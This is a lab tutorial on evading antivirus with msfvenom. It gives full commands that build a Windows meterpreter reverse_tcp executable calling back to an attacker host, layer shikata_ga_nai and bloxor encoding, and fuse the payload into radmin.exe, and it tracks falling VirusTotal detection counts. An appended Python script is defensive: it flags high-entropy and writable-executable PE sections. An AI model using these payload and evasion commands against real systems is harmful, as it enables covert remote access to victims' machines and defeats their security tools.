
Encoders to Bypass Antivirus

Encoders are tools that let you avoid characters in an exploit that would break it (bad characters). An encoder mangles the payload and prepends a decoding stub that runs first and restores the original payload before it executes. As a side effect, encoders can also be used to bypass antivirus programs.

Some encoders produce polymorphic (mutating) code, meaning the encoded payload looks different every time it is generated. This makes it harder for signature-based antivirus programs to detect, since the signature or pattern differs on every run.

Deliverable:

Lab Setup

  • Virtualization using Oracle VirtualBox

  • Attacker's System: Kali Linux

In Kali Linux --> Terminal

1. First, create an exe file using the shikata_ga_nai encoder.

~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP address of attacker system] LPORT=1337 -e x86/shikata_ga_nai -i 10 -f exe > [filename.exe]

Here,

-e --> encoder

x86/shikata_ga_nai --> encoder used

-i --> iteration

10 --> count for iteration (it can be changed as per need)

-f --> output file type

exe --> output file format

[filename.exe] --> output exe file to be created

If this exe file is tested against VirusTotal, around 41/57 (numbers may change) antivirus engines detect it as a malicious exe file.

Note: 'shikata_ga_nai' is the only encoder with an 'excellent' rank.

2. To reduce this count further, we can use more than one encoder, as follows:

Here we will use two encoders: shikata_ga_nai and bloxor.

~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP address of attacker system] LPORT=1337 -e x86/shikata_ga_nai -i 10 -f raw > [filename.bin]

Here,

raw --> output file format

[filename.bin] --> output raw file to be created

Now this raw file is encoded again with the bloxor encoder, reading the payload from standard input (-p -) and writing the new exe to standard output.

~# msfvenom -p - -f exe -a x86 --platform windows -e x86/bloxor -i 2 > [newexefile.exe] < [filename.bin]

Here,

-p --> payload

- --> no payload specified; the raw payload is read from standard input

-a --> architecture

x86 --> architecture value

--platform --> platform

windows --> platform value

x86/bloxor --> encoder to be used

-i --> iteration

2 --> count for iteration

[newexefile.exe] --> new exe file to be created

[filename.bin] --> bin file in raw format created in previous step

If you test this exe against VirusTotal, around 36/57 (numbers may change) antivirus programs detect it as malicious. This value is slightly lower than in the previous step.

3. To reduce the detection rate even further, we can combine two techniques, i.e. fusing the payload into a legitimate exe (-x template, -k to keep the template's behaviour) and using encoders, as follows:

~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP address of attacker system] LPORT=1337 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe > [newexefile.exe]

Now this file is detected as malicious by 29/57 (numbers may change) antivirus programs at VirusTotal, which is lower still than in the previous step. But Microsoft Security Essentials still detects it. Thus we can reduce detectability by combining more encoders and fusing with other exes, although detection never drops to zero.
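The polymorphism described at the top of the page defeats static byte signatures, and the template-fusing step above adds the encoded payload to an otherwise legitimate binary, but both leave traces that do not depend on the exact bytes. As an added example (not part of the original page and not msfvenom or Metasploit code), the Python script below shows a defender-side heuristic: it parses the section table of a PE file, computes the Shannon entropy of each section's raw data, and flags sections that are either high-entropy (as encoder output and packed data tend to be) or marked both writable and executable. The file it scans is a constructed two-section PE skeleton built inline, not a real executable; the 7.0 bits-per-byte threshold and the section names are assumptions chosen for the demonstration.

```python
import math
import random
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Assumed threshold: encoded/packed blobs usually sit above 7 bits per byte.
HIGH_ENTROPY = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Yield (name, raw_data, characteristics) for each section in a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # COFF file header follows the signature
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_opt             # section table follows the optional header
    for i in range(num_sections):
        off = table + 40 * i                 # each IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        characteristics = struct.unpack_from("<I", pe, off + 36)[0]
        yield name, pe[raw_ptr:raw_ptr + raw_size], characteristics


def suspicious_sections(pe: bytes):
    """Return [(section_name, [reasons])] for sections worth a closer look."""
    findings = []
    for name, data, chars in parse_sections(pe):
        reasons = []
        ent = shannon_entropy(data)
        if ent >= HIGH_ENTROPY:
            reasons.append(f"high entropy {ent:.2f}")
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            reasons.append("writable+executable")
        if reasons:
            findings.append((name, reasons))
    return findings


def build_sample_pe() -> bytes:
    """Constructed two-section PE skeleton for the demo; it is not runnable code."""
    # Repetitive, low-entropy bytes standing in for ordinary compiled code.
    text = (b"\x55\x8b\xec" * 300).ljust(1024, b"\0")
    # Seeded pseudo-random bytes standing in for an encoded payload blob.
    rng = random.Random(1337)
    blob = bytes(rng.getrandbits(8) for _ in range(4096))

    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)  # i386, 2 sections, no optional header
    data_start = 0x40 + 4 + 20 + 40 * 2                         # raw data follows the section table

    def section(name, data, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(data), 0x1000, len(data), ptr, 0, 0, 0, 0, chars)

    s_text = section(b".text", text, data_start, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)
    s_blob = section(b".rsrc", blob, data_start + len(text),
                     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE)
    return dos + b"PE\0\0" + coff + s_text + s_blob + text + blob


if __name__ == "__main__":
    for name, reasons in suspicious_sections(build_sample_pe()):
        print(f"{name}: {', '.join(reasons)}")
```

Against real files, read the bytes from disk and pass them to suspicious_sections. Entropy alone is a weak signal (compressed resources and legitimately packed binaries score high too), so treat a hit as a triage cue and pair it with behavioural telemetry such as an outbound connection to an unexpected host and port right after the process starts, which is the part of a reverse_tcp payload that no encoder changes.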